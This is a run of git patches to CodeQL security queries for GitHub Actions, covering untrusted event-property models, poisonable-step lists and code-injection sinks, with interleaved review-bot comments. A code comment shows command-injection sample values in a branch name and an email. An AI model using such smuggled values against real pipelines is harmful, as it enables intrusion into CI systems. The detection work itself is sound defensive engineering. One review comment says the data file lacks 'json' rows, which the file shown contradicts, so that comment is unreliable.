By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem 
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 574c2d7bffe9..89d2e7413067 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem From 4516d3df812d065888e374a1662cf9b3e6d6a8d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 16:09:49 +0200 Subject: [PATCH 357/707] Bump qlpack versions --- ql/lib/codeql-pack.lock.yml | 12 ++++++------ ql/lib/qlpack.yml | 8 ++++---- ql/src/codeql-pack.lock.yml | 12 ++++++------ ql/test/codeql-pack.lock.yml | 12 ++++++------ 4 files changed, 22 insertions(+), 22 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 4b8239b7f6ca..21e0b8bb0e91 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b2b92e45e7af..5f3825a91577 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -4,10 +4,10 @@ warnOnImplicitThis: true name: github/actions-all version: 0.1.7 dependencies: - codeql/util: ^1.0.0 - codeql/yaml: ^1.0.0 - codeql/controlflow: ^1.0.0 - codeql/dataflow: ^1.0.0 + codeql/util: ^1.0.1 + codeql/yaml: ^1.0.1 + codeql/controlflow: ^1.0.1 + codeql/dataflow: ^1.0.1 extractor: javascript groups: javascript dataExtensions: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 4b8239b7f6ca..21e0b8bb0e91 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 4b8239b7f6ca..21e0b8bb0e91 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false From a99d293309942f7879d670ba8c10645e54820fb8 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 27 Jun 2024 16:33:45 +0200
Subject: [PATCH 358/707] Bump to dataflow version 1.0.1
---
.../actions/dataflow/internal/DataFlowPrivate.qll | 10 ++++++++++
ql/lib/qlpack.yml | 1 +
ql/{src => lib}/semmlecode.javascript.dbscheme | 0
ql/{src => lib}/semmlecode.javascript.dbscheme.stats | 0
ql/src/qlpack.yml | 1 -
5 files changed, 11 insertions(+), 1 deletion(-)
rename ql/{src => lib}/semmlecode.javascript.dbscheme (100%)
rename ql/{src => lib}/semmlecode.javascript.dbscheme.stats (100%)
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
index 17b29f57025c..ec889f19205a 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
@@ -84,6 +84,11 @@ class DataFlowCall instanceof Cfg::Node {
 /** Gets a best-effort total ordering. */
 int totalorder() { none() }
+
+ /** Gets the location of this call. */
+ Location getLocation() {
+ result = this.getLocation()
+ }
 }
 /**
@@ -113,6 +118,11 @@ class DataFlowCallable instanceof Cfg::CfgScope {
 /** Gets a best-effort total ordering. */
 int totalorder() { none() }
+
+ /** Gets the location of this callable. */
+ Location getLocation() {
+ result = this.getLocation()
+ }
 }
 newtype TReturnKind = TNormalReturn()
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 5f3825a91577..3c37e64b8567 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -9,6 +9,7 @@ dependencies:
 codeql/controlflow: ^1.0.1
 codeql/dataflow: ^1.0.1
 extractor: javascript
+dbscheme: semmlecode.javascript.dbscheme
 groups: javascript
 dataExtensions:
 - ext/manual/*.model.yml
diff --git a/ql/src/semmlecode.javascript.dbscheme b/ql/lib/semmlecode.javascript.dbscheme
similarity index 100%
rename from ql/src/semmlecode.javascript.dbscheme
rename to ql/lib/semmlecode.javascript.dbscheme
diff --git a/ql/src/semmlecode.javascript.dbscheme.stats b/ql/lib/semmlecode.javascript.dbscheme.stats
similarity index 100%
rename from ql/src/semmlecode.javascript.dbscheme.stats
rename to ql/lib/semmlecode.javascript.dbscheme.stats
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 899f62cf9ba4..f7464c784529 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -5,7 +5,6 @@ version: 0.1.7
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
-dbscheme: semmlecode.javascript.dbscheme
 defaultSuiteFile: codeql-suites/actions-code-scanning.qls
 dependencies:
 github/actions-all: ${workspace}
From d998373162cd1660881a14b3feac29da1efac113 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 27 Jun 2024 17:08:40 +0200
Subject: [PATCH 359/707] Move event sources to config files
---
ql/lib/codeql/actions/config/Config.qll | 10 ++
.../actions/config/ConfigExtensions.qll | 5 +
.../codeql/actions/dataflow/FlowSources.qll | 154 +-----------------
.../ext/config/untrusted_event_properties.yml | 83 ++++++++++
4 files changed, 103 insertions(+), 149 deletions(-)
create mode 100644 ql/lib/ext/config/untrusted_event_properties.yml
diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll
index d6a85c426c68..dd63fda93d1d 100644
--- a/ql/lib/codeql/actions/config/Config.qll
+++ b/ql/lib/codeql/actions/config/Config.qll
@@ -72,3 +72,13 @@ predicate poisonableLocalScriptsDataModel(string regexp, int group) {
 predicate poisonableActionsDataModel(string action) {
 Extensions::poisonableActionsDataModel(action)
 }
+
+/**
+ * MaD models for for event properties that can be user-controlled.
+ * Fields:
+ * - property: event property
+ * - kind: property kind
+ */
+predicate untrustedEventPropertiesDataModel(string property, string kind) {
+ Extensions::untrustedEventPropertiesDataModel(property, kind)
+}
diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll
index 3ca4b6a75593..26e77ce7235f 100644
--- a/ql/lib/codeql/actions/config/ConfigExtensions.qll
+++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll
@@ -39,3 +39,8 @@ extensible predicate poisonableLocalScriptsDataModel(string regexp, int group);
 */
 extensible predicate poisonableActionsDataModel(string action);
+/**
+ * Holds for event properties that can be user-controlled.
+ */
+extensible predicate untrustedEventPropertiesDataModel(string property, string kind);
+
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index b09664359abc..79934ca586bf 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
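Review bot: `Location getLocation() { result = this.getLocation() }`, added in both the `DataFlowCall` and `DataFlowCallable` hunks, calls the member it is defining: these are `instanceof` classes, so `this.getLocation()` does not reach `Cfg::Node` / `Cfg::CfgScope` but resolves to the new predicate itself, which as written is self-recursive with no base case and should evaluate to no results, leaving every call and callable without a location for the shared dataflow library. The intended line is `result = super.getLocation()` in both places. I would confirm with a pack compile, since QL may instead report the recursion as an error rather than returning empty results silently.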
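Review bot: The QLDoc on `untrustedEventPropertiesDataModel` calls the first field an "event property", but the only caller in this series (`GitHubEventCtxSource`) hands it to `wrapRegexp`, and the rows in `untrusted_event_properties.yml` are escaped regular expressions such as `github\\.event\\.pages\\[[0-9]+\\]\\.title`, so the field is a regexp over the context path; the comment also doubles "for for" and leaves the `kind` vocabulary unstated. I would rewrite the fields as ` * - property: regular expression matched against the normalized context expression (e.g. github\\.event\\.issue\\.title)` and ` * - kind: taint category consumed by the sources (title, url, text, branch, label, email, ... as listed in the yml)`, and keep that list in step with the data file.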
@@ -20,136 +20,6 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } -private string titleEvent() { - result = - [ - "github\\.event\\.issue\\.title", // issue - "github\\.event\\.pull_request\\.title", // pull request - "github\\.event\\.discussion\\.title", // discussion - "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title", "github\\.event\\.workflow_run\\.display_title", - ] -} - -private string urlEvent() { result = "github\\.event\\.pull_request\\.head\\.repo\\.homepage" } - -private string textEvent() { - result = - [ - "github\\.event\\.issue\\.body", // body - "github\\.event\\.pull_request\\.body", // body - "github\\.event\\.discussion\\.body", // body - "github\\.event\\.review\\.body", // body - "github\\.event\\.comment\\.body", // body - "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage - "github\\.event\\.head_commit\\.message", // message - "github\\.event\\.workflow_run\\.head_commit\\.message", // message - "github\\.event\\.pull_request\\.head\\.repo\\.description", // description - "github\\.event\\.workflow_run\\.head_repository\\.description", // description - "github\\.event\\.client_payload\\[[0-9]+\\]", // payload - "github\\.event\\.client_payload", // payload - ] -} - -private string branchEvent() { - // branch - // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names - // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. - // - They must contain at least one / - // - They cannot have two consecutive dots .. anywhere. - // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. - // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. 
- // - They cannot begin or end with a slash / or contain multiple consecutive slashes - // - They cannot end with a dot . - // - They cannot contain a sequence @{ - // - They cannot be the single character @ - // - They cannot contain a \ - // eg: zzz";echo${IFS}"hello";# would be a valid branch name - result = - [ - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - "github\\.event\\.merge_group\\.head_ref", - ] -} - -private string labelEvent() { - // - They cannot contain a escaping \ - result = ["github\\.event\\.pull_request\\.head\\.label",] -} - -private string emailEvent() { - // `echo${IFS}hello`@domain.com - result = - [ - "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.merge_group\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - ] -} - -private string usernameEvent() { - // All characters must be either a hyphen (-) or alphanumeric - result = - [ - "github\\.event\\.head_commit\\.author\\.name", - "github\\.event\\.head_commit\\.committer\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", - "github\\.event\\.merge_group\\.committer\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", - ] -} - -private string pathEvent() { - result = - [ - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", - "github\\.event\\.workflow_run\\.referenced_workflows\\.path", - ] -} - -private string 
jsonEvent() { - result = - [ - "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", - "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", - "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.issue", "github\\.event\\.merge_group", - "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", - "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", - "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", - "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_commit", - "github\\.event\\.workflow_run\\.head_commit\\.author", - "github\\.event\\.workflow_run\\.head_commit\\.committer", - "github\\.event\\.workflow_run\\.head_repository", - "github\\.event\\.workflow_run\\.pull_requests", - ] - or - result = titleEvent() - or - result = urlEvent() - or - result = textEvent() - or - result = branchEvent() - or - result = labelEvent() - or - result = emailEvent() - or - result = usernameEvent() - or - result = pathEvent() -} - class GitHubCtxSource extends RemoteFlowSource { string flag; @@ -184,23 +54,8 @@ class GitHubEventCtxSource extends RemoteFlowSource { or exists(e.getEnclosingCompositeAction()) ) and - ( - regexp = titleEvent() and flag = "title" - or - regexp = urlEvent() and flag = "url" - or - regexp = textEvent() and flag = "text" - or - regexp = branchEvent() and flag = "branch" - or - regexp = labelEvent() and flag = "label" - or - regexp = emailEvent() and flag = "email" - or - regexp = usernameEvent() and flag = "username" - or - regexp = pathEvent() and flag = "filename" - ) and + untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and normalizeExpr(context).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") ) } 
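Review bot: `not flag = "json"` only has an effect if the new data model contains rows of kind `json`, and none appears in the visible part of `untrusted_event_properties.yml` (kinds title, url, text, branch, label, email); the deleted `jsonEvent()` also covered bare contexts such as `github`, `github\\.event`, `github\\.event\\.comment` and `github\\.event\\.workflow_run` that no typed row matches. If those are not re-added as `json` rows, `GitHubEventJsonSource` silently loses them and this exclusion is dead code. A comment on the new line, `// rows of kind "json" feed GitHubEventJsonSource only`, plus the missing rows would make the split explicit. The characteristic predicate of `GitHubEventCtxSource` begins outside the hunk.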
@@ -212,9 +67,10 @@ class GitHubEventJsonSource extends RemoteFlowSource { string flag; GitHubEventJsonSource() { - exists(Expression e, string context | + exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and + untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` @@ -223,7 +79,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and - normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(jsonEvent()) + ".*") + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") or // github.event is taintes for all triggers contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml new file mode 100644 index 000000000000..739544455da7 --- /dev/null +++ b/ql/lib/ext/config/untrusted_event_properties.yml 
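Review bot: `untrustedEventPropertiesDataModel(regexp, _)` binds `regexp` to every row of the table, not only the rows flagged `json`; this reproduces the removed jsonEvent(), which unioned titleEvent(), urlEvent(), textEvent() and the other categories, but nothing in the new code says so and a reader will assume `"json"` was meant. Add a comment on that line, e.g. `// every untrusted property, not only the "json" rows: mirrors the former jsonEvent() union`, or bind the flag explicitly if the narrower set is intended. The constructor of GitHubEventJsonSource begins before the first hunk and continues after the second.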
@@ -0,0 +1,83 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: untrustedEventPropertiesDataModel
+ data:
+ # TITLE
+ - ["github\\.event\\.issue\\.title", "title"]
+ - ["github\\.event\\.pull_request\\.title", "title"]
+ - ["github\\.event\\.discussion\\.title", "title"]
+ - ["github\\.event\\.pages\\[[0-9]+\\]\\.page_name", "title"]
+ - ["github\\.event\\.pages\\[[0-9]+\\]\\.title", "title"]
+ - ["github\\.event\\.workflow_run\\.display_title", "title"]
+ # URL
+ - ["github\\.event\\.pull_request\\.head\\.repo\\.homepage", "url"]
+ # TEXT
+ - ["github\\.event\\.issue\\.body", "text"]
+ - ["github\\.event\\.pull_request\\.body", "text"]
+ - ["github\\.event\\.discussion\\.body", "text"]
+ - ["github\\.event\\.review\\.body", "text"]
+ - ["github\\.event\\.comment\\.body", "text"]
+ - ["github\\.event\\.commits\\[[0-9]+\\]\\.message", "text"]
+ - ["github\\.event\\.head_commit\\.message", "text"]
+ - ["github\\.event\\.workflow_run\\.head_commit\\.message", "text"]
+ - ["github\\.event\\.pull_request\\.head\\.repo\\.description", "text"]
+ - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"]
+ - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"]
+ - ["github\\.event\\.client_payload", "text"]
+ # BRANCH
+ - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"]
+ - ["github\\.event\\.pull_request\\.head\\.ref", "branch"]
+ - ["github\\.event\\.workflow_run\\.head_branch", "branch"]
+ - ["github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "branch"]
+ - ["github\\.event\\.merge_group\\.head_ref", "branch"]
+ # LABEL
+ - ["github\\.event\\.pull_request\\.head\\.label", "label"]
+ # EMAIL
+ - ["github\\.event\\.head_commit\\.author\\.email", "email"]
+ - ["github\\.event\\.head_commit\\.committer\\.email", "email"]
+ - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", "email"]
+ - ["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", "email"]
+ - 
["github\\.event\\.merge_group\\.committer\\.email", "email"]
+ - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "email"]
+ - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", "email"]
+ # USERNAME
+ - ["github\\.event\\.head_commit\\.author\\.name", "username"]
+ - ["github\\.event\\.head_commit\\.committer\\.name", "username"]
+ - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", "username"]
+ - ["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", "username"]
+ - ["github\\.event\\.merge_group\\.committer\\.name", "username"]
+ - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "username"]
+ - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", "username"]
+ # PATH
+ - ["github\\.event\\.workflow\\.path", "path"]
+ - ["github\\.event\\.workflow_run\\.path", "path"]
+ - ["github\\.event\\.workflow_run\\.referenced_workflows\\.path", "path"]
+ # JSON
+ - ["github", "json"]
+ - ["github\\.event", "json"]
+ - ["github\\.event\\.client_payload", "json"]
+ - ["github\\.event\\.comment", "json"]
+ - ["github\\.event\\.commits", "json"]
+ - ["github\\.event\\.discussion", "json"]
+ - ["github\\.event\\.head_commit", "json"]
+ - ["github\\.event\\.head_commit\\.author", "json"]
+ - ["github\\.event\\.head_commit\\.committer", "json"]
+ - ["github\\.event\\.issue", "json"]
+ - ["github\\.event\\.merge_group", "json"]
+ - ["github\\.event\\.merge_group\\.committer", "json"]
+ - ["github\\.event\\.pull_request", "json"]
+ - ["github\\.event\\.pull_request\\.head", "json"]
+ - ["github\\.event\\.pull_request\\.head\\.repo", "json"]
+ - ["github\\.event\\.pages", "json"]
+ - ["github\\.event\\.review", "json"]
+ - ["github\\.event\\.workflow", "json"]
+ - ["github\\.event\\.workflow_run", "json"]
+ - ["github\\.event\\.workflow_run\\.head_branch", "json"]
+ - ["github\\.event\\.workflow_run\\.head_commit", "json"]
+ - ["github\\.event\\.workflow_run\\.head_commit\\.author", "json"]
+ - 
["github\\.event\\.workflow_run\\.head_commit\\.committer", "json"]
+ - ["github\\.event\\.workflow_run\\.head_repository", "json"]
+ - ["github\\.event\\.workflow_run\\.pull_requests", "json"]
+
+
From 682236e432e97cef2d7af4b6892d2c2ba7887c08 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 27 Jun 2024 17:25:55 +0200
Subject: [PATCH 360/707] New poisonable steps
---
 ql/lib/ext/config/poisonable_steps.yml | 39 +++++++++++++++-----------
 1 file changed, 23 insertions(+), 16 deletions(-)
diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml
index 9a9af08872c8..9ad251007e57 100644
--- a/ql/lib/ext/config/poisonable_steps.yml
+++ b/ql/lib/ext/config/poisonable_steps.yml
@@ -17,29 +17,36 @@ extensions:
 # source: https://boostsecurityio.github.io/lotp/
 data:
 - ["ant "]
- - ["bundle install"]
- - ["bundle exec "]
+ - ["bundle "]
 - ["cargo "]
+ - ["checkov "]
+ - ["eslint "]
 - ["go generate"]
+ - ["go run"]
 - ["gomplate "]
 - ["gradle "]
- - ["java -jar "]
+ - ["java -jar"]
 - ["make "]
- - ["mkdocs build"]
- - ["msbuild "]
- - ["mvn "]
- - ["npm i(nstall)?(\\b|$)"]
- - ["npm run "]
- - ["npm ci(\\b|$)"]
- - ["pip install -r "]
+ - ["mkdocs"]
+ - ["msbuild"]
+ - ["mvn"]
+ - ["mypy"]
+ - ["npm i(nstall)?"]
+ - ["npm run"]
+ - ["npm ci"]
+ - ["pre-commit"]
+ - ["prettier"]
+ - ["pip install -r"]
 - ["pip install --requirement"]
- - ["poetry install"]
- - ["poetry run"]
- - ["pre-commit run"]
- - ["pre-commit install"]
+ - ["poetry"]
+ - ["pylint"]
 - ["pytest"]
- - ["terraform plan"]
- - ["terraform apply"]
+ - ["rake "]
+ - ["rails db:create"]
+ - ["rails assets:precompile"]
+ - ["rubocop "]
+ - ["terraform "]
+ - ["tflint"]
 - ["yarn "]
 - addsTo:
 pack: github/actions-all
From 04c4cedb41a55c7455a021ae69835c680576e717 Mon Sep 17 00:00:00 2001
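Review bot: The per-category rationale that accompanied the removed predicates (the branch-name character rules, `All characters must be either a hyphen (-) or alphanumeric` for usernames, the note that labels cannot contain an escaping `\`) did not survive the move into this data file, which now carries only the `# TITLE`, `# BRANCH`, `# USERNAME` headings. Those notes are what tells a query author which flags denote a constrained character set and which denote free text, so keep them as YAML comments under the matching heading, e.g. `# BRANCH: ref names cannot contain \, @{, consecutive slashes or a trailing dot`. `github\\.event\\.client_payload` is listed twice, once as `text` and once as `json`; that looks deliberate but deserves a one-line comment so the duplicate is not "cleaned up" later.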
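Review bot: Several patterns lose the boundary that kept them from matching unrelated commands: `npm i(nstall)?(\\b|$)` becomes `npm i(nstall)?`, `mvn ` becomes `mvn`, `mkdocs build` becomes `mkdocs`, and `poetry install`/`poetry run` collapse to `poetry`. If these rows are used as regular expressions against the command text (the matching code is not in this hunk), `npm i` now also fires on `npm info`/`npm init` and `mvn` on any word starting with those letters, which reads as a false-positive regression rather than a coverage gain. Keep the boundary where the prefix is ambiguous, e.g. `- ["npm i(nstall)?(\\b|$)"]`, `- ["mvn(\\b|$)"]`, `- ["poetry (install|run)(\\b|$)"]`, and say in the `# source:` comment which entries were widened on purpose and why.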
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:26:04 +0200 Subject: [PATCH 361/707] New code injection sink --- ql/lib/ext/manual/mikefarah_yq.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 ql/lib/ext/manual/mikefarah_yq.model.yml diff --git a/ql/lib/ext/manual/mikefarah_yq.model.yml b/ql/lib/ext/manual/mikefarah_yq.model.yml new file mode 100644 index 000000000000..35aecbdd9681 --- /dev/null +++ b/ql/lib/ext/manual/mikefarah_yq.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["mikefarah/yq", "*", "input.cmd", "code-injection", "manual"] + From 31fe5952dc61f9cbbb59b2036c6ca8fff9b7616c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:32:03 +0200 Subject: [PATCH 362/707] New poisonable steps --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 9ad251007e57..11f17ae26239 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -10,6 +10,7 @@ extensions: - ["bridgecrewio/checkov-action"] - ["ruby/setup-ruby"] - ["actions/jekyll-build-pages"] + - ["qcastel/github-actions-maven/actions/maven"] - addsTo: pack: github/actions-all extensible: poisonableCommandsDataModel From c57e4929cb01c2c291c76ef75c58012faabc8acb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:32:21 +0200 Subject: [PATCH 363/707] New code injection sink --- ql/lib/ext/manual/devorbitus_yq-action-output.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 ql/lib/ext/manual/devorbitus_yq-action-output.model.yml diff --git a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml new file mode 100644 index 000000000000..412db371965c --- /dev/null 
+++ b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["devorbitus/yq-action-output", "*", "input.cmd", "code-injection", "manual"] + From b64f53e03e83073984e309301ffdaefbdc7db806 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:33:08 +0200 Subject: [PATCH 364/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3c37e64b8567..30120f7d321f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.7 +version: 0.1.8 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f7464c784529..dad05ff4af39 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.7 +version: 0.1.8 groups: [actions, queries] suites: codeql-suites extractor: javascript From effa1e135670cfdaa01a83d42a156be6ff7eff87 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:20 +0200 Subject: [PATCH 365/707] Move ControlChecks to its own file --- .../codeql/actions/security/ControlChecks.qll | 65 +++++++++++++++++++ .../security/UntrustedCheckoutQuery.qll | 63 ------------------ .../Security/CWE-285/ImproperAccessControl.ql | 1 + .../UntrustedCheckoutTOCTOUCritical.ql | 1 + .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 1 + .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../Security/CWE-829/UntrustedCheckoutHigh.ql | 1 + .../CWE-829/UntrustedCheckoutMedium.ql | 1 + 8 files changed, 71 insertions(+), 63 deletions(-) create mode 100644 ql/lib/codeql/actions/security/ControlChecks.qll 
diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll
new file mode 100644
index 000000000000..fdafda1fc27a
--- /dev/null
+++ b/ql/lib/codeql/actions/security/ControlChecks.qll
@@ -0,0 +1,65 @@
+import actions
+
+/** An If node that contains an actor, user or label check */
+abstract class ControlCheck extends If {
+ predicate dominates(Step step) {
+ step.getIf() = this or
+ step.getEnclosingJob().getIf() = this or
+ step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or
+ step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this
+ }
+}
+
+class LabelControlCheck extends ControlCheck {
+ LabelControlCheck() {
+ // eg: contains(github.event.pull_request.labels.*.name, 'safe to test')
+ // eg: github.event.label.name == 'safe to test'
+ exists(
+ normalizeExpr(this.getCondition())
+ .regexpFind([
+ "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b"
+ ], _, _)
+ )
+ }
+}
+
